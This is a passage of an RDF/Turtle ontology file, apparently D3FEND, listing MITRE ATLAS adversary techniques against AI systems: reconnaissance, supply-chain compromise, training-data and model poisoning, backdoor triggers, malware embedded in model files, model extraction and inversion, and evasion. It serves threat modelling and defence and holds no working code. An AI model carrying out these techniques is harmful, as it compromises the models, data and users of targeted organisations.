@prefix d3f: . @prefix dcterms: . @prefix owl: . @prefix rdf: . @prefix rdfs: . @prefix skos: . @prefix xsd: . d3f:AMD64CodeSegment a d3f:ImageCodeSegment, d3f:ProcessCodeSegment, owl:NamedIndividual ; rdfs:label "AMD64 Code Segment" . d3f:AML.T0000.000 a owl:Class ; rdfs:label "Journals and Conference Proceedings - ATLAS" ; d3f:attack-id "AML.T0000.000" ; d3f:definition """Many of the publications accepted at premier artificial intelligence conferences and journals come from commercial labs. Some journals and conferences are open access, others may require paying for access or a membership. These publications will often describe in detail all aspects of a particular approach for reproducibility. This information can be used by adversaries to implement the paper.""" ; rdfs:seeAlso ; rdfs:subClassOf d3f:AML.T0000 ; skos:prefLabel "Journals and Conference Proceedings" . d3f:AML.T0000.001 a owl:Class ; rdfs:label "Pre-Print Repositories - ATLAS" ; d3f:attack-id "AML.T0000.001" ; d3f:definition """Pre-Print repositories, such as arXiv, contain the latest academic research papers that haven't been peer reviewed. They may contain research notes, or technical reports that aren't typically published in journals or conference proceedings. Pre-print repositories also serve as a central location to share papers that have been accepted to journals. Searching pre-print repositories provide adversaries with a relatively up-to-date view of what researchers in the victim organization are working on.""" ; rdfs:seeAlso ; rdfs:subClassOf d3f:AML.T0000 ; skos:prefLabel "Pre-Print Repositories" . d3f:AML.T0000.002 a owl:Class ; rdfs:label "Technical Blogs - ATLAS" ; d3f:attack-id "AML.T0000.002" ; d3f:definition """Research labs at academic institutions and company R&D divisions often have blogs that highlight their use of artificial intelligence and its application to the organization's unique problems. Individual researchers also frequently document their work in blogposts. An adversary may search for posts made by the target victim organization or its employees. In comparison to [Journals and Conference Proceedings](/techniques/AML.T0000.000) and [Pre-Print Repositories](/techniques/AML.T0000.001) this material will often contain more practical aspects of the AI system. This could include underlying technologies and frameworks used, and possibly some information about the API access and use case. This will help the adversary better understand how that organization is using AI internally and the details of their approach that could aid in tailoring an attack.""" ; rdfs:seeAlso ; rdfs:subClassOf d3f:AML.T0000 ; skos:prefLabel "Technical Blogs" . d3f:AML.T0001 a owl:Class ; rdfs:label "Search Open AI Vulnerability Analysis - ATLAS" ; d3f:attack-id "AML.T0001" ; d3f:definition """Much like the [Search Open Technical Databases](/techniques/AML.T0000), there is often ample research available on the vulnerabilities of common AI models. Once a target has been identified, an adversary will likely try to identify any pre-existing work that has been done for this class of models. This will include not only reading academic papers that may identify the particulars of a successful attack, but also identifying pre-existing implementations of those attacks. The adversary may obtain [Adversarial AI Attack Implementations](/techniques/AML.T0016.000) or develop their own [Adversarial AI Attacks](/techniques/AML.T0017.000) if necessary.""" ; rdfs:seeAlso ; rdfs:subClassOf d3f:ATLASReconnaissanceTechnique ; skos:prefLabel "Search Open AI Vulnerability Analysis" . d3f:AML.T0002.000 a owl:Class ; rdfs:label "Datasets - ATLAS" ; d3f:attack-id "AML.T0002.000" ; d3f:definition """Adversaries may collect public datasets to use in their operations. Datasets used by the victim organization or datasets that are representative of the data used by the victim organization may be valuable to adversaries. Datasets can be stored in cloud storage, or on victim-owned websites. Some datasets require the adversary to [Establish Accounts](/techniques/AML.T0021) for access. Acquired datasets help the adversary advance their operations, stage attacks, and tailor attacks to the victim organization.""" ; rdfs:seeAlso ; rdfs:subClassOf d3f:AML.T0002 ; skos:prefLabel "Datasets" . d3f:AML.T0002.001 a owl:Class ; rdfs:label "Models - ATLAS" ; d3f:attack-id "AML.T0002.001" ; d3f:definition """Adversaries may acquire public models to use in their operations. Adversaries may seek models used by the victim organization or models that are representative of those used by the victim organization. Representative models may include model architectures, or pre-trained models which define the architecture as well as model parameters from training on a dataset. The adversary may search public sources for common model architecture configuration file formats such as YAML or Python configuration files, and common model storage file formats such as ONNX (.onnx), HDF5 (.h5), Pickle (.pkl), PyTorch (.pth), or TensorFlow (.pb, .tflite). Acquired models are useful in advancing the adversary's operations and are frequently used to tailor attacks to the victim model.""" ; rdfs:seeAlso ; rdfs:subClassOf d3f:AML.T0002 ; skos:prefLabel "Models" . d3f:AML.T0003 a owl:Class ; rdfs:label "Search Victim-Owned Websites - ATLAS" ; d3f:attack-id "AML.T0003" ; d3f:definition """Adversaries may search websites owned by the victim for information that can be used during targeting. Victim-owned websites may contain technical details about their AI-enabled products or services. Victim-owned websites may contain a variety of details, including names of departments/divisions, physical locations, and data about key employees such as names, roles, and contact info. These sites may also have details highlighting business operations and relationships. Adversaries may search victim-owned websites to gather actionable information. This information may help adversaries tailor their attacks (e.g. [Adversarial AI Attacks](/techniques/AML.T0017.000) or [Manual Modification](/techniques/AML.T0043.003)). Information from these sources may reveal opportunities for other forms of reconnaissance (e.g. [Search Open Technical Databases](/techniques/AML.T0000) or [Search Open AI Vulnerability Analysis](/techniques/AML.T0001))""" ; rdfs:seeAlso ; rdfs:subClassOf d3f:ATLASReconnaissanceTechnique ; skos:prefLabel "Search Victim-Owned Websites" . d3f:AML.T0004 a owl:Class ; rdfs:label "Search Application Repositories - ATLAS" ; d3f:attack-id "AML.T0004" ; d3f:definition """Adversaries may search open application repositories during targeting. Examples of these include Google Play, the iOS App store, the macOS App Store, and the Microsoft Store. Adversaries may craft search queries seeking applications that contain AI-enabled components. Frequently, the next step is to [Acquire Public AI Artifacts](/techniques/AML.T0002).""" ; rdfs:seeAlso ; rdfs:subClassOf d3f:ATLASReconnaissanceTechnique ; skos:prefLabel "Search Application Repositories" . d3f:AML.T0005.000 a owl:Class ; rdfs:label "Train Proxy via Gathered AI Artifacts - ATLAS" ; d3f:attack-id "AML.T0005.000" ; d3f:definition """Proxy models may be trained from AI artifacts (such as data, model architectures, and pre-trained models) that are representative of the target model gathered by the adversary. This can be used to develop attacks that require higher levels of access than the adversary has available or as a means to validate pre-existing attacks without interacting with the target model.""" ; rdfs:seeAlso ; rdfs:subClassOf d3f:AML.T0005 ; skos:prefLabel "Train Proxy via Gathered AI Artifacts" . d3f:AML.T0005.001 a owl:Class ; rdfs:label "Train Proxy via Replication - ATLAS" ; d3f:attack-id "AML.T0005.001" ; d3f:definition """Adversaries may replicate a private model. By repeatedly querying the victim's [AI Model Inference API Access](/techniques/AML.T0040), the adversary can collect the target model's inferences into a dataset. The inferences are used as labels for training a separate model offline that will mimic the behavior and performance of the target model. A replicated model that closely mimic's the target model is a valuable resource in staging the attack. The adversary can use the replicated model to [Craft Adversarial Data](/techniques/AML.T0043) for various purposes (e.g. [Evade AI Model](/techniques/AML.T0015), [Spamming AI System with Chaff Data](/techniques/AML.T0046)).""" ; rdfs:seeAlso ; rdfs:subClassOf d3f:AML.T0005 ; skos:prefLabel "Train Proxy via Replication" . d3f:AML.T0005.002 a owl:Class ; rdfs:label "Use Pre-Trained Model - ATLAS" ; d3f:attack-id "AML.T0005.002" ; d3f:definition "Adversaries may use an off-the-shelf pre-trained model as a proxy for the victim model to aid in staging the attack." ; rdfs:seeAlso ; rdfs:subClassOf d3f:AML.T0005 ; skos:prefLabel "Use Pre-Trained Model" . d3f:AML.T0006 a owl:Class ; rdfs:label "Active Scanning - ATLAS" ; d3f:attack-id "AML.T0006" ; d3f:definition """An adversary may probe or scan the victim system to gather information for targeting. This is distinct from other reconnaissance techniques that do not involve direct interaction with the victim system. Adversaries may scan for open ports on a potential victim's network, which can indicate specific services or tools the victim is utilizing. This could include a scan for tools related to AI DevOps or AI services themselves such as public AI chat agents (ex: [Copilot Studio Hunter](https://github.com/mbrg/power-pwn/wiki/Modules:-Copilot-Studio-Hunter-%E2%80%90-Enum)). They can also send emails to organization service addresses and inspect the replies for indicators that an AI agent is managing the inbox. Information gained from Active Scanning may yield targets that provide opportunities for other forms of reconnaissance such as [Search Open Technical Databases](/techniques/AML.T0000), [Search Open AI Vulnerability Analysis](/techniques/AML.T0001), or [Gather RAG-Indexed Targets](/techniques/AML.T0064).""" ; rdfs:seeAlso ; rdfs:subClassOf d3f:ATLASReconnaissanceTechnique ; skos:prefLabel "Active Scanning" . d3f:AML.T0007 a owl:Class ; rdfs:label "Discover AI Artifacts - ATLAS" ; d3f:attack-id "AML.T0007" ; d3f:definition """Adversaries may search private sources to identify AI learning artifacts that exist on the system and gather information about them. These artifacts can include the software stack used to train and deploy models, training and testing data management systems, container registries, software repositories, and model zoos. This information can be used to identify targets for further collection, exfiltration, or disruption, and to tailor and improve attacks.""" ; rdfs:seeAlso ; rdfs:subClassOf d3f:ATLASDiscoveryTechnique ; skos:prefLabel "Discover AI Artifacts" . d3f:AML.T0008.000 a owl:Class ; rdfs:label "AI Development Workspaces - ATLAS" ; d3f:attack-id "AML.T0008.000" ; d3f:definition """Developing and staging AI attacks often requires expensive compute resources. Adversaries may need access to one or many GPUs in order to develop an attack. They may try to anonymously use free resources such as Google Colaboratory, or cloud resources such as AWS, Azure, or Google Cloud as an efficient way to stand up temporary resources to conduct operations. Multiple workspaces may be used to avoid detection.""" ; rdfs:seeAlso ; rdfs:subClassOf d3f:AML.T0008 ; skos:prefLabel "AI Development Workspaces" . d3f:AML.T0008.001 a owl:Class ; rdfs:label "Consumer Hardware - ATLAS" ; d3f:attack-id "AML.T0008.001" ; d3f:definition """Adversaries may acquire consumer hardware to conduct their attacks. Owning the hardware provides the adversary with complete control of the environment. These devices can be hard to trace.""" ; rdfs:seeAlso ; rdfs:subClassOf d3f:AML.T0008 ; skos:prefLabel "Consumer Hardware" . d3f:AML.T0008.002 a owl:Class ; rdfs:label "Domains - ATLAS" ; d3f:attack-id "AML.T0008.002" ; d3f:definition """Adversaries may acquire domains that can be used during targeting. Domain names are the human readable names used to represent one or more IP addresses. They can be purchased or, in some cases, acquired for free. Adversaries may use acquired domains for a variety of purposes (see [ATT&CK](https://attack.mitre.org/techniques/T1583/001/)). Large AI datasets are often distributed as a list of URLs to individual datapoints. Adversaries may acquire expired domains that are included in these datasets and replace individual datapoints with poisoned examples ([Publish Poisoned Datasets](/techniques/AML.T0019)).""" ; rdfs:seeAlso ; rdfs:subClassOf d3f:AML.T0008 ; skos:prefLabel "Domains" . d3f:AML.T0008.003 a owl:Class ; rdfs:label "Physical Countermeasures - ATLAS" ; d3f:attack-id "AML.T0008.003" ; d3f:definition """Adversaries may acquire or manufacture physical countermeasures to aid or support their attack. These components may be used to disrupt or degrade the model, such as adversarial patterns printed on stickers or T-shirts, disguises, or decoys. They may also be used to disrupt or degrade the sensors used in capturing data, such as laser pointers, light bulbs, or other tools.""" ; rdfs:seeAlso ; rdfs:subClassOf d3f:AML.T0008 ; skos:prefLabel "Physical Countermeasures" . d3f:AML.T0008.004 a owl:Class ; rdfs:label "Serverless - ATLAS" ; d3f:attack-id "AML.T0008.004" ; d3f:definition """Adversaries may purchase and configure serverless cloud infrastructure, such as Cloudflare Workers, AWS Lambda functions, or Google Apps Scripts, that can be used during targeting. By utilizing serverless infrastructure, adversaries can make it more difficult to attribute infrastructure used during operations back to them. Once acquired, the serverless runtime environment can be leveraged to either respond directly to infected machines or to Proxy traffic to an adversary-owned command and control server. As traffic generated by these functions will appear to come from subdomains of common cloud providers, it may be difficult to distinguish from ordinary traffic to these providers. This can be used to bypass a Content Security Policy which prevent retrieving content from arbitrary locations.""" ; rdfs:seeAlso ; rdfs:subClassOf d3f:AML.T0008 ; skos:prefLabel "Serverless" . d3f:AML.T0010.000 a owl:Class ; rdfs:label "Hardware - ATLAS" ; d3f:attack-id "AML.T0010.000" ; d3f:definition "Adversaries may target AI systems by disrupting or manipulating the hardware supply chain. AI models often run on specialized hardware such as GPUs, TPUs, or embedded devices, but may also be optimized to operate on CPUs." ; rdfs:seeAlso ; rdfs:subClassOf d3f:AML.T0010 ; skos:prefLabel "Hardware" . d3f:AML.T0010.001 a owl:Class ; rdfs:label "AI Software - ATLAS" ; d3f:attack-id "AML.T0010.001" ; d3f:definition """Most AI systems rely on a limited set of AI frameworks. An adversary could get access to a large number of AI systems through a comprise of one of their supply chains. Many AI projects also rely on other open source implementations of various algorithms. These can also be compromised in a targeted way to get access to specific systems.""" ; rdfs:seeAlso ; rdfs:subClassOf d3f:AML.T0010 ; skos:prefLabel "AI Software" . d3f:AML.T0010.002 a owl:Class ; rdfs:label "Data - ATLAS" ; d3f:attack-id "AML.T0010.002" ; d3f:definition """Data is a key vector of supply chain compromise for adversaries. Every AI project will require some form of data. Many rely on large open source datasets that are publicly available. An adversary could rely on compromising these sources of data. The malicious data could be a result of [Poison Training Data](/techniques/AML.T0020) or include traditional malware. An adversary can also target private datasets in the labeling phase. The creation of private datasets will often require the hiring of outside labeling services. An adversary can poison a dataset by modifying the labels being generated by the labeling service.""" ; rdfs:seeAlso ; rdfs:subClassOf d3f:AML.T0010 ; skos:prefLabel "Data" . d3f:AML.T0010.003 a owl:Class ; rdfs:label "Model - ATLAS" ; d3f:attack-id "AML.T0010.003" ; d3f:definition """AI-enabled systems often rely on open sourced models in various ways. Most commonly, the victim organization may be using these models for fine tuning. These models will be downloaded from an external source and then used as the base for the model as it is tuned on a smaller, private dataset. Loading models often requires executing some saved code in the form of a saved model file. These can be compromised with traditional malware, or through some adversarial AI techniques.""" ; rdfs:seeAlso ; rdfs:subClassOf d3f:AML.T0010 ; skos:prefLabel "Model" . d3f:AML.T0010.004 a owl:Class ; rdfs:label "Container Registry - ATLAS" ; d3f:attack-id "AML.T0010.004" ; d3f:definition """An adversary may compromise a victim's container registry by pushing a manipulated container image and overwriting an existing container name and/or tag. Users of the container registry as well as automated CI/CD pipelines may pull the adversary's container image, compromising their AI Supply Chain. This can affect development and deployment environments. Container images may include AI models, so the compromised image could have an AI model which was manipulated by the adversary (See [Manipulate AI Model](/techniques/AML.T0018)).""" ; rdfs:seeAlso ; rdfs:subClassOf d3f:AML.T0010 ; skos:prefLabel "Container Registry" . d3f:AML.T0011.000 a owl:Class ; rdfs:label "Unsafe AI Artifacts - ATLAS" ; d3f:attack-id "AML.T0011.000" ; d3f:definition """Adversaries may develop unsafe AI artifacts that when executed have a deleterious effect. The adversary can use this technique to establish persistent access to systems. These models may be introduced via a [AI Supply Chain Compromise](/techniques/AML.T0010). Serialization of models is a popular technique for model storage, transfer, and loading. However, this format without proper checking presents an opportunity for code execution.""" ; rdfs:seeAlso ; rdfs:subClassOf d3f:AML.T0011 ; skos:prefLabel "Unsafe AI Artifacts" . d3f:AML.T0011.001 a owl:Class ; rdfs:label "Malicious Package - ATLAS" ; d3f:attack-id "AML.T0011.001" ; d3f:definition """Adversaries may develop malicious software packages that when imported by a user have a deleterious effect. Malicious packages may behave as expected to the user. They may be introduced via [AI Supply Chain Compromise](/techniques/AML.T0010). They may not present as obviously malicious to the user and may appear to be useful for an AI-related task.""" ; rdfs:seeAlso ; rdfs:subClassOf d3f:AML.T0011 ; skos:prefLabel "Malicious Package" . d3f:AML.T0012 a owl:Class ; rdfs:label "Valid Accounts - ATLAS" ; d3f:attack-id "AML.T0012" ; d3f:definition """Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access. Credentials may take the form of usernames and passwords of individual user accounts or API keys that provide access to various AI resources and services. Compromised credentials may provide access to additional AI artifacts and allow the adversary to perform [Discover AI Artifacts](/techniques/AML.T0007). Compromised credentials may also grant an adversary increased privileges such as write access to AI artifacts used during development or production.""" ; rdfs:seeAlso ; rdfs:subClassOf d3f:ATLASInitialAccessTechnique ; skos:prefLabel "Valid Accounts" . d3f:AML.T0013 a owl:Class ; rdfs:label "Discover AI Model Ontology - ATLAS" ; d3f:attack-id "AML.T0013" ; d3f:definition """Adversaries may discover the ontology of an AI model's output space, for example, the types of objects a model can detect. The adversary may discovery the ontology by repeated queries to the model, forcing it to enumerate its output space. Or the ontology may be discovered in a configuration file or in documentation about the model. The model ontology helps the adversary understand how the model is being used by the victim. It is useful to the adversary in creating targeted attacks.""" ; rdfs:seeAlso ; rdfs:subClassOf d3f:ATLASDiscoveryTechnique ; skos:prefLabel "Discover AI Model Ontology" . d3f:AML.T0014 a owl:Class ; rdfs:label "Discover AI Model Family - ATLAS" ; d3f:attack-id "AML.T0014" ; d3f:definition """Adversaries may discover the general family of model. General information about the model may be revealed in documentation, or the adversary may use carefully constructed examples and analyze the model's responses to categorize it. Knowledge of the model family can help the adversary identify means of attacking the model and help tailor the attack.""" ; rdfs:seeAlso ; rdfs:subClassOf d3f:ATLASDiscoveryTechnique ; skos:prefLabel "Discover AI Model Family" . d3f:AML.T0015 a owl:Class ; rdfs:label "Evade AI Model - ATLAS" ; d3f:attack-id "AML.T0015" ; d3f:definition """Adversaries can [Craft Adversarial Data](/techniques/AML.T0043) that prevents an AI model from correctly identifying the contents of the data or [Generate Deepfakes](/techniques/AML.T0088) that fools an AI model expecting authentic data. This technique can be used to evade a downstream task where AI is utilized. The adversary may evade AI-based virus/malware detection or network scanning towards the goal of a traditional cyber attack. AI model evasion through deepfake generation may also provide initial access to systems that use AI-based biometric authentication.""" ; rdfs:seeAlso ; rdfs:subClassOf d3f:ATLASDefenseEvasionTechnique, d3f:ATLASImpactTechnique, d3f:ATLASInitialAccessTechnique ; skos:prefLabel "Evade AI Model" . d3f:AML.T0016.000 a owl:Class ; rdfs:label "Adversarial AI Attack Implementations - ATLAS" ; d3f:attack-id "AML.T0016.000" ; d3f:definition "Adversaries may search for existing open source implementations of AI attacks. The research community often publishes their code for reproducibility and to further future research. Libraries intended for research purposes, such as CleverHans, the Adversarial Robustness Toolbox, and FoolBox, can be weaponized by an adversary. Adversaries may also obtain and use tools that were not originally designed for adversarial AI attacks as part of their attack." ; rdfs:seeAlso ; rdfs:subClassOf d3f:AML.T0016 ; skos:prefLabel "Adversarial AI Attack Implementations" . d3f:AML.T0016.001 a owl:Class ; rdfs:label "Software Tools - ATLAS" ; d3f:attack-id "AML.T0016.001" ; d3f:definition """Adversaries may search for and obtain software tools to support their operations. Software designed for legitimate use may be repurposed by an adversary for malicious intent. An adversary may modify or customize software tools to achieve their purpose. Software tools used to support attacks on AI systems are not necessarily AI-based themselves.""" ; rdfs:seeAlso ; rdfs:subClassOf d3f:AML.T0016 ; skos:prefLabel "Software Tools" . d3f:AML.T0016.002 a owl:Class ; rdfs:label "Generative AI - ATLAS" ; d3f:attack-id "AML.T0016.002" ; d3f:definition """Adversaries may search for and obtain generative AI models or tools, such as large language models (LLMs), to assist them in various steps of their operation. Generative AI can be used in a variety of malicious ways, including generating malware or offensive cyber scripts, [Retrieval Content Crafting](/techniques/AML.T0066), or generating [Phishing](/techniques/AML.T0052) content. Adversaries may obtain an open source model or they may leverage a generative AI service. They may need to jailbreak the generative AI model to bypass any restrictions put in place to limit the types of responses it can generate. They may also need to break the terms of service of the generative AI.""" ; rdfs:seeAlso ; rdfs:subClassOf d3f:AML.T0016 ; skos:prefLabel "Generative AI" . d3f:AML.T0017.000 a owl:Class ; rdfs:label "Adversarial AI Attacks - ATLAS" ; d3f:attack-id "AML.T0017.000" ; d3f:definition """Adversaries may develop their own adversarial attacks. They may leverage existing libraries as a starting point ([Adversarial AI Attack Implementations](/techniques/AML.T0016.000)). They may implement ideas described in public research papers or develop custom made attacks for the victim model.""" ; rdfs:seeAlso ; rdfs:subClassOf d3f:AML.T0017 ; skos:prefLabel "Adversarial AI Attacks" . d3f:AML.T0018.000 a owl:Class ; rdfs:label "Poison AI Model - ATLAS" ; d3f:attack-id "AML.T0018.000" ; d3f:definition """Adversaries may manipulate an AI model's weights to change it's behavior or performance, resulting in a poisoned model. Adversaries may poison a model by by directly manipulating its weights, training the model on poisoned data, further fine-tuning the model, or otherwise interfering with its training process. The change in behavior of poisoned models may be limited to targeted categories in predictive AI models, or targeted topics, concepts, or facts in generative AI models, or aim for a general performance degradation.""" ; rdfs:seeAlso ; rdfs:subClassOf d3f:AML.T0018 ; skos:prefLabel "Poison AI Model" . d3f:AML.T0018.001 a owl:Class ; rdfs:label "Modify AI Model Architecture - ATLAS" ; d3f:attack-id "AML.T0018.001" ; d3f:definition """Adversaries may directly modify an AI model's architecture to re-define it's behavior. This can include adding or removing layers as well as adding pre or post-processing operations. The effects could include removing the ability to predict certain classes, adding erroneous operations to increase computation costs, or degrading performance. Additionally, a separate adversary-defined network could be injected into the computation graph, which can change the behavior based on the inputs, effectively creating a backdoor.""" ; rdfs:seeAlso ; rdfs:subClassOf d3f:AML.T0018 ; skos:prefLabel "Modify AI Model Architecture" . d3f:AML.T0018.002 a owl:Class ; rdfs:label "Embed Malware - ATLAS" ; d3f:attack-id "AML.T0018.002" ; d3f:definition """Adversaries may embed malicious code into AI Model files. AI models may be packaged as a combination of instructions and weights. Some formats such as pickle files are unsafe to deserialize because they can contain unsafe calls such as exec. Models with embedded malware may still operate as expected. It may allow them to achieve Execution, Command & Control, or Exfiltrate Data.""" ; rdfs:seeAlso ; rdfs:subClassOf d3f:AML.T0018 ; skos:prefLabel "Embed Malware" . d3f:AML.T0019 a owl:Class ; rdfs:label "Publish Poisoned Datasets - ATLAS" ; d3f:attack-id "AML.T0019" ; d3f:definition """Adversaries may [Poison Training Data](/techniques/AML.T0020) and publish it to a public location. The poisoned dataset may be a novel dataset or a poisoned variant of an existing open source dataset. This data may be introduced to a victim system via [AI Supply Chain Compromise](/techniques/AML.T0010).""" ; rdfs:seeAlso ; rdfs:subClassOf d3f:ATLASResourceDevelopmentTechnique ; skos:prefLabel "Publish Poisoned Datasets" . d3f:AML.T0020 a owl:Class ; rdfs:label "Poison Training Data - ATLAS" ; d3f:attack-id "AML.T0020" ; d3f:definition """Adversaries may attempt to poison datasets used by an AI model by modifying the underlying data or its labels. This allows the adversary to embed vulnerabilities in AI models trained on the data that may not be easily detectable. Data poisoning attacks may or may not require modifying the labels. The embedded vulnerability is activated at a later time by data samples with an [Insert Backdoor Trigger](/techniques/AML.T0043.004) Poisoned data can be introduced via [AI Supply Chain Compromise](/techniques/AML.T0010) or the data may be poisoned after the adversary gains [Initial Access](/tactics/AML.TA0004) to the system.""" ; rdfs:seeAlso ; rdfs:subClassOf d3f:ATLASPersistenceTechnique, d3f:ATLASResourceDevelopmentTechnique ; skos:prefLabel "Poison Training Data" . d3f:AML.T0021 a owl:Class ; rdfs:label "Establish Accounts - ATLAS" ; d3f:attack-id "AML.T0021" ; d3f:definition "Adversaries may create accounts with various services for use in targeting, to gain access to resources needed in [AI Attack Staging](/tactics/AML.TA0001), or for victim impersonation." ; rdfs:seeAlso ; rdfs:subClassOf d3f:ATLASResourceDevelopmentTechnique ; skos:prefLabel "Establish Accounts" . d3f:AML.T0024.000 a owl:Class ; rdfs:label "Infer Training Data Membership - ATLAS" ; d3f:attack-id "AML.T0024.000" ; d3f:definition """Adversaries may infer the membership of a data sample or global characteristics of the data in its training set, which raises privacy concerns. Some strategies make use of a shadow model that could be obtained via [Train Proxy via Replication](/techniques/AML.T0005.001), others use statistics of model prediction scores. This can cause the victim model to leak private information, such as PII of those in the training set or other forms of protected IP.""" ; rdfs:seeAlso ; rdfs:subClassOf d3f:AML.T0024 ; skos:prefLabel "Infer Training Data Membership" . d3f:AML.T0024.001 a owl:Class ; rdfs:label "Invert AI Model - ATLAS" ; d3f:attack-id "AML.T0024.001" ; d3f:definition """AI models' training data could be reconstructed by exploiting the confidence scores that are available via an inference API. By querying the inference API strategically, adversaries can back out potentially private information embedded within the training data. This could lead to privacy violations if the attacker can reconstruct the data of sensitive features used in the algorithm.""" ; rdfs:seeAlso ; rdfs:subClassOf d3f:AML.T0024 ; skos:prefLabel "Invert AI Model" . d3f:AML.T0024.002 a owl:Class ; rdfs:label "Extract AI Model - ATLAS" ; d3f:attack-id "AML.T0024.002" ; d3f:definition """Adversaries may extract a functional copy of a private model. By repeatedly querying the victim's [AI Model Inference API Access](/techniques/AML.T0040), the adversary can collect the target model's inferences into a dataset. The inferences are used as labels for training a separate model offline that will mimic the behavior and performance of the target model. Adversaries may extract the model to avoid paying per query in an artificial intelligence as a service (AIaaS) setting. Model extraction is used for [AI Intellectual Property Theft](/techniques/AML.T0048.004).""" ; rdfs:seeAlso ; rdfs:subClassOf d3f:AML.T0024 ; skos:prefLabel "Extract AI Model" . d3f:AML.T0025 a owl:Class ; rdfs:label "Exfiltration via Cyber Means - ATLAS" ; d3f:attack-id "AML.T0025" ; d3f:definition """Adversaries may exfiltrate AI artifacts or other information relevant to their goals via traditional cyber means. See the ATT&CK [Exfiltration](https://attack.mitre.org/tactics/TA0010/) tactic for more information.""" ; rdfs:seeAlso ; rdfs:subClassOf d3f:ATLASExfiltrationTechnique ; skos:prefLabel "Exfiltration via Cyber Means" . d3f:AML.T0029 a owl:Class ; rdfs:label "Denial of AI Service - ATLAS" ; d3f:attack-id "AML.T0029" ; d3f:definition """Adversaries may target AI-enabled systems with a flood of requests for the purpose of degrading or shutting down the service. Since many AI systems require significant amounts of specialized compute, they are often expensive bottlenecks that can become overloaded. Adversaries can intentionally craft inputs that require heavy amounts of useless compute from the AI system.""" ; rdfs:seeAlso ; rdfs:subClassOf d3f:ATLASImpactTechnique ; skos:prefLabel "Denial of AI Service" . d3f:AML.T0031 a owl:Class ; rdfs:label "Erode AI Model Integrity - ATLAS" ; d3f:attack-id "AML.T0031" ; d3f:definition """Adversaries may degrade the target model's performance with adversarial data inputs to erode confidence in the system over time. This can lead to the victim organization wasting time and money both attempting to fix the system and performing the tasks it was meant to automate by hand.""" ; rdfs:seeAlso ; rdfs:subClassOf d3f:ATLASImpactTechnique ; skos:prefLabel "Erode AI Model Integrity" . d3f:AML.T0034 a owl:Class ; rdfs:label "Cost Harvesting - ATLAS" ; d3f:attack-id "AML.T0034" ; d3f:definition """Adversaries may target different AI services to send useless queries or computationally expensive inputs to increase the cost of running services at the victim organization. Sponge examples are a particular type of adversarial data designed to maximize energy consumption and thus operating cost.""" ; rdfs:seeAlso ; rdfs:subClassOf d3f:ATLASImpactTechnique ; skos:prefLabel "Cost Harvesting" . d3f:AML.T0035 a owl:Class ; rdfs:label "AI Artifact Collection - ATLAS" ; d3f:attack-id "AML.T0035" ; d3f:definition """Adversaries may collect AI artifacts for [Exfiltration](/tactics/AML.TA0010) or for use in [AI Attack Staging](/tactics/AML.TA0001). AI artifacts include models and datasets as well as other telemetry data produced when interacting with a model.""" ; rdfs:seeAlso ; rdfs:subClassOf d3f:ATLASCollectionTechnique ; skos:prefLabel "AI Artifact Collection" . d3f:AML.T0036 a owl:Class ; rdfs:label "Data from Information Repositories - ATLAS" ; d3f:attack-id "AML.T0036" ; d3f:definition """Adversaries may leverage information repositories to mine valuable information. Information repositories are tools that allow for storage of information, typically to facilitate collaboration or information sharing between users, and can store a wide variety of data that may aid adversaries in further objectives, or direct access to the target information. Information stored in a repository may vary based on the specific instance or environment. Specific common information repositories include SharePoint, Confluence, and enterprise databases such as SQL Server.""" ; rdfs:seeAlso ; rdfs:subClassOf d3f:ATLASCollectionTechnique ; skos:prefLabel "Data from Information Repositories" . d3f:AML.T0037 a owl:Class ; rdfs:label "Data from Local System - ATLAS" ; d3f:attack-id "AML.T0037" ; d3f:definition """Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration. This can include basic fingerprinting information and sensitive data such as ssh keys.""" ; rdfs:seeAlso ; rdfs:subClassOf d3f:ATLASCollectionTechnique ; skos:prefLabel "Data from Local System" . d3f:AML.T0040 a owl:Class ; rdfs:label "AI Model Inference API Access - ATLAS" ; d3f:attack-id "AML.T0040" ; d3f:definition """Adversaries may gain access to a model via legitimate access to the inference API. Inference API access can be a source of information to the adversary ([Discover AI Model Ontology](/techniques/AML.T0013), [Discover AI Model Family](/techniques/AML.T0014)), a means of staging the attack ([Verify Attack](/techniques/AML.T0042), [Craft Adversarial Data](/techniques/AML.T0043)), or for introducing data to the target system for Impact ([Evade AI Model](/techniques/AML.T0015), [Erode AI Model Integrity](/techniques/AML.T0031)). Many systems rely on the same models provided via an inference API, which means they share the same vulnerabilities. This is especially true of foundation models which are prohibitively resource intensive to train. Adversaries may use their access to model APIs to identify vulnerabilities such as jailbreaks or hallucinations and then target applications that use the same models.""" ; rdfs:seeAlso ; rdfs:subClassOf d3f:ATLASAIModelAccessTechnique ; skos:prefLabel "AI Model Inference API Access" . d3f:AML.T0041 a owl:Class ; rdfs:label "Physical Environment Access - ATLAS" ; d3f:attack-id "AML.T0041" ; d3f:definition """In addition to the attacks that take place purely in the digital domain, adversaries may also exploit the physical environment for their attacks. If the model is interacting with data collected from the real world in some way, the adversary can influence the model through access to wherever the data is being collected. By modifying the data in the collection process, the adversary can perform modified versions of attacks designed for digital access.""" ; rdfs:seeAlso ; rdfs:subClassOf d3f:ATLASAIModelAccessTechnique ; skos:prefLabel "Physical Environment Access" . d3f:AML.T0042 a owl:Class ; rdfs:label "Verify Attack - ATLAS" ; d3f:attack-id "AML.T0042" ; d3f:definition """Adversaries can verify the efficacy of their attack via an inference API or access to an offline copy of the target model. This gives the adversary confidence that their approach works and allows them to carry out the attack at a later time of their choosing. The adversary may verify the attack once but use it against many edge devices running copies of the target model. The adversary may verify their attack digitally, then deploy it in the [Physical Environment Access](/techniques/AML.T0041) at a later time. Verifying the attack may be hard to detect since the adversary can use a minimal number of queries or an offline copy of the model.""" ; rdfs:seeAlso ; rdfs:subClassOf d3f:ATLASAIAttackStagingTechnique ; skos:prefLabel "Verify Attack" . d3f:AML.T0043.000 a owl:Class ; rdfs:label "White-Box Optimization - ATLAS" ; d3f:attack-id "AML.T0043.000" ; d3f:definition """In White-Box Optimization, the adversary has full access to the target model and optimizes the adversarial example directly. Adversarial examples trained in this manner are most effective against the target model.""" ; rdfs:seeAlso ; rdfs:subClassOf d3f:AML.T0043 ; skos:prefLabel "White-Box Optimization" . d3f:AML.T0043.001 a owl:Class ; rdfs:label "Black-Box Optimization - ATLAS" ; d3f:attack-id "AML.T0043.001" ; d3f:definition """In Black-Box attacks, the adversary has black-box (i.e. [AI Model Inference API Access](/techniques/AML.T0040) via API access) access to the target model. With black-box attacks, the adversary may be using an API that the victim is monitoring. These attacks are generally less 